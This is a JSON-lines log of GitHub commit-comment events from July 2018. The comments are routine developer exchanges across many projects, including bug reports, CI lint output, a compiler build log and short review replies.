{"id":"7906294234","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"NatronGitHub/openfx-arena"},"payload":{"comment":{"id":29565593,"position":24,"line":207,"path":"Extra/ReadSVG.cpp","commit_id":"a645fa74533bbeba83ea6134d0c8c6f649cec49d","created_at":"2018-07-02T12:15:51Z","updated_at":"2018-07-02T12:15:51Z","author_association":"MEMBER","body":"see https://github.com/NatronGitHub/Natron/issues/292"}},"created_at":"2018-07-02T12:15:51Z"}
{"id":"7906296464","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Silverlight1989/YII2"},"payload":{"comment":{"id":29565597,"position":12,"line":12,"path":"controllers/site_controller.php","commit_id":"84b07f34e6b04b92a128dbf0d7c6de78f8190c32","created_at":"2018-07-02T12:16:17Z","updated_at":"2018-07-02T12:16:17Z","author_association":"CONTRIBUTOR","body":"Аналогично именование файла. Автозагрузчик может не найти такой файл"}},"created_at":"2018-07-02T12:16:17Z"}
{"id":"7906298220","type":"CommitCommentEvent","actor":{"login":"denis19973"},"repo":{"name":"oleshonchar/instabot"},"payload":{"comment":{"id":29565600,"position":14,"line":154,"path":"instagram_bot/bot.py","commit_id":"8c0ec1648d250bf0e2f9fd95022e74de6e670e93","created_at":"2018-07-02T12:16:42Z","updated_at":"2018-07-02T12:16:42Z","author_association":"NONE","body":"user = Authentication.objects.filter(user_id=chat_id).first()\r\nif not user:\r\n    send_message('user does not exists')\r\n"}},"created_at":"2018-07-02T12:16:42Z"}
{"id":"7906298944","type":"CommitCommentEvent","actor":{"login":"Hsuye"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29565604,"position":null,"line":null,"path":null,"commit_id":"031aba0d29fa522e15181fb52b5353f9c0d89a09","created_at":"2018-07-02T12:16:52Z","updated_at":"2018-07-02T12:16:52Z","author_association":"NONE","body":"dalao 在 管理面板 的 节点列表那里打不开。提示Slim Application Error。A website error has occurred. Sorry for the temporary inconvenience.    以为是自己问题 重装了三次 发现都有这个问题"}},"created_at":"2018-07-02T12:16:52Z"}
{"id":"7906299363","type":"CommitCommentEvent","actor":{"login":"MSP-Greg"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29565605,"position":null,"line":null,"path":null,"commit_id":"482bbde6e25620b340e28423c08e3cee941c438b","created_at":"2018-07-02T12:16:57Z","updated_at":"2018-07-02T12:16:57Z","author_association":"NONE","body":"@nobu\r\n\r\nMinGW has the following error from this:\r\n```\r\nTestTimeTZ#test_localtime_zone:\r\nNoMethodError: undefined method `zone' for nil:NilClass\r\n    test/ruby/test_time_tz.rb:112:in `test_localtime_zone'\r\n```\r\n\r\nThanks, Greg"}},"created_at":"2018-07-02T12:16:57Z"}
{"id":"7906301730","type":"CommitCommentEvent","actor":{"login":"joshualiuxu"},"repo":{"name":"jtclaypool/microbiome"},"payload":{"comment":{"id":29565615,"position":null,"line":null,"path":null,"commit_id":"7b2cf36a61db25a313a1fbf77554a5c82ec61f59","created_at":"2018-07-02T12:17:28Z","updated_at":"2018-07-02T12:17:28Z","author_association":"NONE","body":"whether the example has some problem ?"}},"created_at":"2018-07-02T12:17:28Z"}
{"id":"7906301806","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":29565617,"position":null,"line":null,"path":null,"commit_id":"7027ce13cd1601c87d934b2947f5f0b192ed6156","created_at":"2018-07-02T12:17:28Z","updated_at":"2018-07-02T12:17:28Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.namedfile/89/violations\n```\nplone/namedfile/marshaler.py:30:70: C812 missing trailing comma\nplone/namedfile/marshaler.py:69:36: C812 missing trailing comma\nplone/namedfile/storages.py:12:1: I003 isort expected 1 blank line in imports, found 0\nplone/namedfile/testing.py:4:1: I001 isort found an import in the wrong position\nplone/namedfile/testing.py:18:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/namedfile/testing.py:22:36: C812 missing trailing comma\nplone/namedfile/file.py:25:1: I003 isort expected 1 blank line in imports, found 0\nplone/namedfile/file.py:266:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/file.py:307:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/handler.py:11:23: C812 missing trailing comma\nplone/namedfile/interfaces.py:17:25: C812 missing trailing comma\nplone/namedfile/scaling.py:33:1: I003 isort expected 1 blank line in imports, found 0\nplone/namedfile/scaling.py:192:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:195:5: C901 'DefaultImageScalingFactory.__call__' is too complex (15)\nplone/namedfile/scaling.py:202:25: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:242:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:406:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:433:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:445:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:459:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:485:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:499:17: C816 missing trailing comma in Python 3.6+\nplone/namedfile/utils/__init__.py:19:1: I003 isort expected 1 blank line in imports, found 0\nplone/namedfile/utils/__init__.py:83:66: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:150:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:155:73: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:175:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:182:18: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:187:1: C901 'rotate_image' is too complex (20)\nplone/namedfile/utils/__init__.py:218:14: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:270:25: F821 undefined name 'StringIO'\nplone/namedfile/utils/__init__.py:275:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/__init__.py:279:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/tiff_utils.py:11:1: C901 'process_tiff' is too complex (11)\nplone/namedfile/utils/tiff_utils.py:20:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:81:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:82:7: T000 Todo note found.\nplone/namedfile/tests/test_blobfile.py:40:31: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:45:35: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:50:46: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:55:32: C812 missing trailing comma\nplone/namedfile/tests/test_scaling.py:85:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:102:80: E501 line too long (81 > 79 characters)\nplone/namedfile/tests/test_scaling.py:133:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:156:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:178:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:200:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_image.py:25:80: E501 line too long (80 > 79 characters)\nplone/namedfile/tests/test_doctests.py:27:20: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:43:51: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:45:10: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:116:28: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:146:70: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:153:76: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:164:74: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:197:75: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:202:78: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-02T12:17:28Z"}
{"id":"7906302687","type":"CommitCommentEvent","actor":{"login":"ddugovic"},"repo":{"name":"ianfab/Fairy-Stockfish"},"payload":{"comment":{"id":29565620,"position":null,"line":null,"path":null,"commit_id":"329b62ebd75de8a3fe6789f0c54cd28361a94d97","created_at":"2018-07-02T12:17:40Z","updated_at":"2018-07-02T12:17:40Z","author_association":"CONTRIBUTOR","body":"Huh, I wonder why my Ubuntu is doing the following (using a custom make command of `make_cmd = 'make -j6 profile-build ARCH=x86-64-bmi2 COMP=gcc'`:\r\n\r\n```\r\nJul 02 05:28:15 dugovic-host python[1214]: CalledProcessError: Command 'make profile-build COMP=gcc ARCH=x86-64-bmi2 -j 6' returned non-zero exit status 2\r\nJul 02 05:28:15 dugovic-host python[1214]: Task exited\r\nJul 02 05:33:17 dugovic-host python[1214]: Config:\r\nJul 02 05:33:17 dugovic-host python[1214]: debug: 'no'\r\nJul 02 05:33:17 dugovic-host python[1214]: sanitize: 'no'\r\nJul 02 05:33:17 dugovic-host python[1214]: optimize: 'yes'\r\nJul 02 05:33:17 dugovic-host python[1214]: arch: 'x86_64'\r\nJul 02 05:33:17 dugovic-host python[1214]: bits: '64'\r\nJul 02 05:33:18 dugovic-host python[1214]: kernel: 'Linux'\r\nJul 02 05:33:18 dugovic-host python[1214]: os: 'GNU/Linux'\r\nJul 02 05:33:18 dugovic-host python[1214]: prefetch: 'yes'\r\nJul 02 05:33:18 dugovic-host python[1214]: popcnt: 'yes'\r\nJul 02 05:33:18 dugovic-host python[1214]: sse: 'yes'\r\nJul 02 05:33:18 dugovic-host python[1214]: pext: 'yes'\r\nJul 02 05:33:18 dugovic-host python[1214]: Flags:\r\nJul 02 05:33:18 dugovic-host python[1214]: CXX: g++\r\nJul 02 05:33:18 dugovic-host python[1214]: CXXFLAGS: -Wall -Wcast-qual -fno-exceptions -std=c++11  -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto\r\nJul 02 05:33:18 dugovic-host python[1214]: LDFLAGS:  -m64 -Wl,--no-as-needed -lpthread -Wall -Wcast-qual -fno-exceptions -std=c++11  -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -m\r\nJul 02 05:33:18 dugovic-host python[1214]: Testing config sanity. If this fails, try 'make help' ...\r\nJul 02 05:33:18 dugovic-host python[1214]: Step 1/4. Building instrumented executable ...\r\nJul 02 05:33:18 dugovic-host python[1214]: make ARCH=x86-64-bmi2 COMP=gcc gcc-profile-make\r\nJul 02 05:33:18 dugovic-host python[1214]: make[1]: Entering directory '/tmp/tmpE1mXfj/ianfab-Fairy-Stockfish-329b62e/src'\r\nJul 02 05:33:18 dugovic-host python[1214]: make ARCH=x86-64-bmi2 COMP=gcc \\\r\nJul 02 05:33:18 dugovic-host python[1214]: EXTRACXXFLAGS='-fprofile-generate' \\\r\nJul 02 05:33:18 dugovic-host python[1214]: EXTRALDFLAGS='-lgcov' \\\r\nJul 02 05:33:18 dugovic-host python[1214]: all\r\nJul 02 05:33:18 dugovic-host python[1214]: make[2]: Entering directory '/tmp/tmpE1mXfj/ianfab-Fairy-Stockfish-329b62e/src'\r\nJul 02 05:33:18 dugovic-host python[1214]: g++ -Wall -Wcast-qual -fno-exceptions -std=c++11 -fprofile-generate -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto   -c -o ben\r\nJul 02 05:33:18 dugovic-host python[1214]: g++ -Wall -Wcast-qual -fno-exceptions -std=c++11 -fprofile-generate -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto   -c -o bit\r\nJul 02 05:33:18 dugovic-host python[1214]: g++ -Wall -Wcast-qual -fno-exceptions -std=c++11 -fprofile-generate -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto   -c -o bit\r\nJul 02 05:33:18 dugovic-host python[1214]: g++ -Wall -Wcast-qual -fno-exceptions -std=c++11 -fprofile-generate -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto   -c -o end\r\nJul 02 05:33:18 dugovic-host python[1214]: g++ -Wall -Wcast-qual -fno-exceptions -std=c++11 -fprofile-generate -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto   -c -o eva\r\nJul 02 05:33:18 dugovic-host python[1214]: g++ -Wall -Wcast-qual -fno-exceptions -std=c++11 -fprofile-generate -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto   -c -o mai\r\nJul 02 05:33:20 dugovic-host python[1214]: g++ -Wall -Wcast-qual -fno-exceptions -std=c++11 -fprofile-generate -pedantic -Wextra -Wshadow -m64 -DNDEBUG -O3 -DIS_64BIT -msse -msse3 -mpopcnt -DUSE_POPCNT -DUSE_PEXT -mbmi2 -flto   -c -o mat\r\nJul 02 05:33:21 dugovic-host python[1214]: evaluate.cpp: In member function ‘Score {anonymous}::Evaluation<T>::pieces(PieceType)’:\r\nJul 02 05:33:21 dugovic-host python[1214]: evaluate.cpp:318:46: error: there are no arguments to ‘sqrt’ that depend on a template parameter, so a declaration of ‘sqrt’ must be available [-fpermissive]\r\nJul 02 05:33:21 dugovic-host python[1214]:          mobility[Us] += MobilityBonus * (int(sqrt(mob)) - 1);\r\n```"}},"created_at":"2018-07-02T12:17:40Z"}
{"id":"7906303864","type":"CommitCommentEvent","actor":{"login":"maximbaz"},"repo":{"name":"mawww/kakoune"},"payload":{"comment":{"id":29565622,"position":20,"line":100,"path":"rc/extra/git-tools.kak","commit_id":"379e7c2d2d0968ad654e8e60b7164e175d66624c","created_at":"2018-07-02T12:17:53Z","updated_at":"2018-07-02T12:17:53Z","author_association":"CONTRIBUTOR","body":"But then it gets tricky to configure this in a hook to always run, unless I can silence the update-diff in the hook itself? "}},"created_at":"2018-07-02T12:17:53Z"}
{"id":"7906304565","type":"CommitCommentEvent","actor":{"login":"SoDa-GitHub"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29565626,"position":null,"line":null,"path":null,"commit_id":"031aba0d29fa522e15181fb52b5353f9c0d89a09","created_at":"2018-07-02T12:18:02Z","updated_at":"2018-07-02T12:18:02Z","author_association":"COLLABORATOR","body":"你用的master还是dev？dev现在有bug"}},"created_at":"2018-07-02T12:18:02Z"}
{"id":"7906307331","type":"CommitCommentEvent","actor":{"login":"LeGoffMael"},"repo":{"name":"LeGoffMael/rubygms-api"},"payload":{"comment":{"id":29565633,"position":null,"line":null,"path":null,"commit_id":"767b2a4e72c3d2d5f87f4116b0082864fd7de9c0","created_at":"2018-07-02T12:18:39Z","updated_at":"2018-07-02T12:18:39Z","author_association":"OWNER","body":"Didn't work"}},"created_at":"2018-07-02T12:18:39Z"}
{"id":"7906308829","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565637,"position":4,"line":132,"path":"agent/core/src/main/java/com/axway/ats/agent/core/threading/AbstractActionTask.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:18:58Z","updated_at":"2018-07-02T12:18:58Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:18:58Z"}
{"id":"7906310195","type":"CommitCommentEvent","actor":{"login":"pallavikaliyar"},"repo":{"name":"pallavikaliyar/SPLIT"},"payload":{"comment":{"id":29565639,"position":38,"line":38,"path":"LICENSE","commit_id":"c99d73dbd4040f1f8858982a97a10472964cbeef","created_at":"2018-07-02T12:19:14Z","updated_at":"2018-07-02T12:19:14Z","author_association":"OWNER","body":"Author's Name are : Md. Masoom Rabbani"}},"created_at":"2018-07-02T12:19:14Z"}
{"id":"7906312640","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565650,"position":4,"line":54,"path":"agent/core/src/main/java/com/axway/ats/agent/core/threading/AbstractQueueLoader.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:19:44Z","updated_at":"2018-07-02T12:19:44Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:19:44Z"}
{"id":"7906314403","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29565658,"position":null,"line":null,"path":null,"commit_id":"bdfe0ce3b0e896906ba716b18a86ef53b224403d","created_at":"2018-07-02T12:20:08Z","updated_at":"2018-07-02T12:20:08Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=7)"}},"created_at":"2018-07-02T12:20:08Z"}
{"id":"7906314552","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29565659,"position":null,"line":null,"path":null,"commit_id":"9a6713375ae5e207cee8d677304a612dbac5ab22","created_at":"2018-07-02T12:20:10Z","updated_at":"2018-07-02T12:20:10Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=7)"}},"created_at":"2018-07-02T12:20:10Z"}
{"id":"7906317735","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565664,"position":1,"line":44,"path":"agent/core/src/test/java/com/axway/ats/agent/core/ant/Test_ActionClassGenerator.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:20:50Z","updated_at":"2018-07-02T12:20:50Z","author_association":"OWNER","body":"Resolved. Pending additional functionality tests before pull request"}},"created_at":"2018-07-02T12:20:50Z"}
{"id":"7906318938","type":"CommitCommentEvent","actor":{"login":"Hsuye"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29565665,"position":null,"line":null,"path":null,"commit_id":"031aba0d29fa522e15181fb52b5353f9c0d89a09","created_at":"2018-07-02T12:21:06Z","updated_at":"2018-07-02T12:21:06Z","author_association":"NONE","body":"我用的是master的"}},"created_at":"2018-07-02T12:21:06Z"}
{"id":"7906319606","type":"CommitCommentEvent","actor":{"login":"pallavikaliyar"},"repo":{"name":"pallavikaliyar/SPLIT"},"payload":{"comment":{"id":29565667,"position":2,"line":2,"path":"Makefile.include","commit_id":"c99d73dbd4040f1f8858982a97a10472964cbeef","created_at":"2018-07-02T12:21:13Z","updated_at":"2018-07-02T12:21:13Z","author_association":"OWNER","body":"// Authors Name: Md. Masoom Rabbabi and Pallavi Kaliyar"}},"created_at":"2018-07-02T12:21:13Z"}
{"id":"7906320314","type":"CommitCommentEvent","actor":{"login":"LeGoffMael"},"repo":{"name":"LeGoffMael/rubygms-api"},"payload":{"comment":{"id":29565669,"position":null,"line":null,"path":null,"commit_id":"cc5c8d6419b0dd9a6796e85b861689d08ced4c8c","created_at":"2018-07-02T12:21:22Z","updated_at":"2018-07-02T12:21:22Z","author_association":"OWNER","body":"Didn't work"}},"created_at":"2018-07-02T12:21:22Z"}
{"id":"7906325236","type":"CommitCommentEvent","actor":{"login":"02infiinity"},"repo":{"name":"02infiinity/testing"},"payload":{"comment":{"id":29565680,"position":1,"line":1,"path":"balveee.html","commit_id":"307ea41444e8c2dbc75953d05ef3aad2e616191d","created_at":"2018-07-02T12:22:22Z","updated_at":"2018-07-02T12:22:22Z","author_association":"OWNER","body":"this the code of near + shop"}},"created_at":"2018-07-02T12:22:22Z"}
{"id":"7906325731","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":29565684,"position":null,"line":null,"path":null,"commit_id":"b3279fddb758c058be17a2b0e079751120d60efe","created_at":"2018-07-02T12:22:28Z","updated_at":"2018-07-02T12:22:28Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.namedfile/90/violations\n```\nplone/namedfile/testing.py:18:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/namedfile/testing.py:22:36: C812 missing trailing comma\nplone/namedfile/file.py:267:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/file.py:308:9: Q001 Remove bad quotes from multiline string.\nplone/namedfile/handler.py:11:23: C812 missing trailing comma\nplone/namedfile/interfaces.py:17:25: C812 missing trailing comma\nplone/namedfile/scaling.py:193:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:196:5: C901 'DefaultImageScalingFactory.__call__' is too complex (15)\nplone/namedfile/scaling.py:203:25: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:243:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:407:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:434:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:446:25: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:460:21: C816 missing trailing comma in Python 3.6+\nplone/namedfile/scaling.py:486:29: C815 missing trailing comma in Python 3.5+\nplone/namedfile/scaling.py:500:17: C816 missing trailing comma in Python 3.6+\nplone/namedfile/utils/__init__.py:84:66: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:151:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:156:73: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:176:15: T000 Todo note found.\nplone/namedfile/utils/__init__.py:183:18: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:188:1: C901 'rotate_image' is too complex (20)\nplone/namedfile/utils/__init__.py:219:14: C812 missing trailing comma\nplone/namedfile/utils/__init__.py:271:25: F821 undefined name 'StringIO'\nplone/namedfile/utils/__init__.py:276:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/__init__.py:280:1: E302 expected 2 blank lines, found 1\nplone/namedfile/utils/tiff_utils.py:11:1: C901 'process_tiff' is too complex (11)\nplone/namedfile/utils/tiff_utils.py:20:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:81:7: T000 Todo note found.\nplone/namedfile/utils/tiff_utils.py:82:7: T000 Todo note found.\nplone/namedfile/tests/test_blobfile.py:40:31: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:45:35: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:50:46: C812 missing trailing comma\nplone/namedfile/tests/test_blobfile.py:55:32: C812 missing trailing comma\nplone/namedfile/tests/test_scaling.py:85:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:102:80: E501 line too long (81 > 79 characters)\nplone/namedfile/tests/test_scaling.py:133:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:156:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:178:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_scaling.py:200:80: E501 line too long (86 > 79 characters)\nplone/namedfile/tests/test_image.py:25:80: E501 line too long (80 > 79 characters)\nplone/namedfile/tests/test_doctests.py:27:20: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:43:51: C812 missing trailing comma\nplone/namedfile/tests/test_doctests.py:45:10: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:116:28: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:146:70: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:153:76: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:164:74: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:197:75: C812 missing trailing comma\nplone/namedfile/tests/test_scaling_functional.py:202:78: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-02T12:22:28Z"}
{"id":"7906325822","type":"CommitCommentEvent","actor":{"login":"Infinisil"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29565685,"position":null,"line":null,"path":null,"commit_id":"1fa2503f9dba814eb23726a25642d2180ce791c3","created_at":"2018-07-02T12:22:30Z","updated_at":"2018-07-02T12:22:30Z","author_association":"CONTRIBUTOR","body":"This commit apparently broke @GrahamcOfBorg: https://gist.github.com/GrahamcOfBorg/523ddf6954b6921fd897c93a517ae551\r\n\r\nPing @grahamc "}},"created_at":"2018-07-02T12:22:30Z"}
{"id":"7906330027","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"vert-x3/vertx-proton"},"payload":{"comment":{"id":29565695,"position":8,"line":331,"path":"src/main/java/io/vertx/proton/ProtonLink.java","commit_id":"35eeb59f82bf8f95d7e7a6b1b0d8a296ede09f2a","created_at":"2018-07-02T12:23:24Z","updated_at":"2018-07-02T12:23:24Z","author_association":"CONTRIBUTOR","body":"another option would be to overload ProtonLink and ProtonSession's *close* method with a variant accepting a boolean which indicates whether the ilnk/session should be disposed of (true) or kept *in the list) (false). The default behavior FMPOV should be to dispose the link/session when the existing variants of the close method are invoked ..."}},"created_at":"2018-07-02T12:23:24Z"}
{"id":"7906331393","type":"CommitCommentEvent","actor":{"login":"velhbxtyrj"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29565706,"position":null,"line":null,"path":null,"commit_id":"b13879e619333525026d48364610456e10b1d67f","created_at":"2018-07-02T12:23:41Z","updated_at":"2018-07-02T12:23:41Z","author_association":"COLLABORATOR","body":"I use GitHub Desktop. And this is the first such thing happened. I could not do anything with this file. Did the rollback of this file back but it still displayed as changed completely."}},"created_at":"2018-07-02T12:23:41Z"}
{"id":"7906332657","type":"CommitCommentEvent","actor":{"login":"paulmillar"},"repo":{"name":"dCache/dcache"},"payload":{"comment":{"id":29565708,"position":null,"line":null,"path":null,"commit_id":"ee8f1148ce7597c7687a35f766652bb2470fd908","created_at":"2018-07-02T12:23:57Z","updated_at":"2018-07-02T12:23:57Z","author_association":"MEMBER","body":"> Does \"Require-notes: yes\" even has any effect?\r\n\r\nNot directly, no.  It says that the developer believes the change is something that should be documented in the release-notes.  The person compiling the release notes is free to ignore that.\r\n\r\n> This change [...] should [...] be documented\r\n\r\nI agree.  Please open a ticket/issue to make sure the release notes are update."}},"created_at":"2018-07-02T12:23:57Z"}
{"id":"7906338465","type":"CommitCommentEvent","actor":{"login":"denji"},"repo":{"name":"Juniper/open-nti"},"payload":{"comment":{"id":29565729,"position":38,"line":36,"path":"plugins/input-jti/fluent.conf","commit_id":"6004e9e572a59c51354e7e45f3c3f5b8852f7260","created_at":"2018-07-02T12:25:11Z","updated_at":"2018-07-02T12:25:11Z","author_association":"NONE","body":"`rewriterule*` deprecated."}},"created_at":"2018-07-02T12:25:11Z"}
{"id":"7906365377","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29565806,"position":null,"line":null,"path":null,"commit_id":"76fbba231e740d247071deda13ee311b568dc57a","created_at":"2018-07-02T12:30:36Z","updated_at":"2018-07-02T12:30:36Z","author_association":"COLLABORATOR","body":"Hey @jannes-m , thanks for the changes. I will work on this part later today, but a few comments:\r\n1. I know that GeoPackage is a database format (see the table in the text). However, it is (a) a good alternative to shp and (b) from the perspective of the sf package - you cannot write both rasters and vectors...\r\n2. Totally agree that Shapefile-must-die is an awful name.\r\n3. In terms of \"openness\" - I think it is hard to fully classify .shp as an open or closed format. That is why it is described as a \"Partially open\" in the table. My reasoning here is that (1) the format is proprietary, (2) the specification is open, (3) I am almost sure (but unable to find any confirmation now) that some of the additional shapefiles files do not have an open specification. \r\n4. How did you get a number of 200 formats? `gdal::gdalDrivers()` does not exist - do you mean rgdal? If so I've got \"only\" 138 formats there (probably depends on the gdal compilation options..). `sf:::CPL_get_rgdal_drivers()` is not returning any output on my computer..."}},"created_at":"2018-07-02T12:30:36Z"}
{"id":"7906368565","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"ahlumcho/TIL"},"payload":{"comment":{"id":29565812,"position":14,"line":14,"path":"180702.md","commit_id":"50e74956026721c84881bb0f8ccd77dea23369c9","created_at":"2018-07-02T12:31:10Z","updated_at":"2018-07-02T12:31:10Z","author_association":"NONE","body":"순차, 선택, 반복, 이 세 가지 요소의 재귀적 결합(recursive composition)이라고 표현하면 더 정확해요. 😄 "}},"created_at":"2018-07-02T12:31:10Z"}
{"id":"7906368585","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-4-js"},"payload":{"comment":{"id":29565813,"position":null,"line":null,"path":null,"commit_id":"0b4ccbfc052e79b84afacebc06c5fa1da1f7e944","created_at":"2018-07-02T12:31:11Z","updated_at":"2018-07-02T12:31:11Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-02T12:31:11Z"}
